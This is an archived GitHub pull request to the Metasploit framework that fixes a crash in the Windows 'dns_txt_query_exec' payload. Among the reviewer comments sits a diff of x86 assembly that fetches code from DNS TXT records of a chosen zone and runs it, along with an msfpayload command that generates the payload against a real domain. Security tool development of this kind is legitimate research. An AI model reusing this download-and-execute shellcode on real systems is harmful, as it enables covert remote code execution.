Skip to content

Loading…

Improved payload dns_txt_query_exec #1057

Merged
merged 16 commits into from

3 participants

@corelanc0d3r

Fixed a possible payload crash on XP and Win7.
(did not test if patch works on other OSes)

Made payload a few bytes smaller

To test, feel free to run the setup at corelan.eu:

./msfpayload windows/dns_txt_query_exec DNSZONE=corelan.eu C

(you should get a messagebox)

@corelanc0d3r

tested on Win2003 R2 SP2 as well, works fine

@ChrisJohnRiley

Is this an extension of what we were working on in April? if so just let me know if you want the server-side delivery code

@corelanc0d3r

this is a bugfix to the existing module (which simply downloads payload) - the modules we worked on in April allow us to download an executable... Maybe it's time to review those modules again & see what needs to be done to make them work reliably

@ChrisJohnRiley

Ok, sorry did't want to hijack the thread... lets chat offline and get the ball rolling again!

... and we return you to your regularly scheduled programming

@corelanc0d3r

what ? is it evening already ? :)

@wchen-r7

Tested ok on Windows 7 SP1.

@wchen-r7 wchen-r7 merged commit 0bf92b5 into rapid7:master

1 check passed

Details default The Travis build passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Oct 24, 2012
  1. @corelanc0d3r

    merge

    corelanc0d3r committed
Commits on Oct 29, 2012
  1. @corelanc0d3r
Commits on Oct 30, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Oct 31, 2012
  1. @corelanc0d3r
Commits on Nov 3, 2012
  1. @corelanc0d3r
Commits on Nov 6, 2012
  1. @corelanc0d3r
Commits on Nov 7, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r

    restored original file

    corelanc0d3r committed
Commits on Nov 8, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Nov 9, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Nov 12, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
  3. @corelanc0d3r
Showing with 7 additions and 7 deletions.
  1. +7 −7 modules/payloads/singles/windows/dns_txt_query_exec.rb
View
14 modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -160,7 +160,7 @@ def generate
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
- jmp next_mod ; Process this module
+ jmp.i8 next_mod ; Process this module
; actual routine
start:
@@ -195,7 +195,7 @@ def generate
mov bl,0x61 ; first query, start with 'a'
dnsquery:
- jmp get_dnsname ; get dnsname
+ jmp.i8 get_dnsname ; get dnsname
get_dnsname_return:
pop eax ; get ptr to dnsname (lpstrName)
@@ -215,7 +215,7 @@ def generate
call ebp ;
test eax, eax ; query ok ?
jnz jump_to_payload ; no, jump to payload
- jmp get_query_result ; eax = 0 : a piece returned, fetch it
+ jmp.i8 get_query_result ; eax = 0 : a piece returned, fetch it
get_dnsname:
@@ -225,9 +225,9 @@ def generate
get_query_result:
xchg #{bufferreg},edx ; save start of heap
pop #{bufferreg} ; heap structure containing DNS results
- mov eax,[#{bufferreg}] ; if first dword has a non-null value, then stop
- test eax,eax
- jnz prepare_payload ; jmp to payload
+ mov eax,[#{bufferreg}+0x18] ; check if value at offset 0x18 is 0x1
+ cmp eax,1
+ jne prepare_payload ; jmp to payload
add #{bufferreg},#{wTypeOffset} ; get ptr to ptr to DNS reply
mov #{bufferreg},[#{bufferreg}] ; get ptr to DNS reply
@@ -243,7 +243,7 @@ def generate
push edi ;
inc ebx ; increment sequence
xchg #{bufferreg},edx ; restore start of heap
- jmp dnsquery ; try to get the next piece, if any
+ jmp.i8 dnsquery ; try to get the next piece, if any
prepare_payload:
mov #{bufferreg},edx
Something went wrong with that request. Please try again.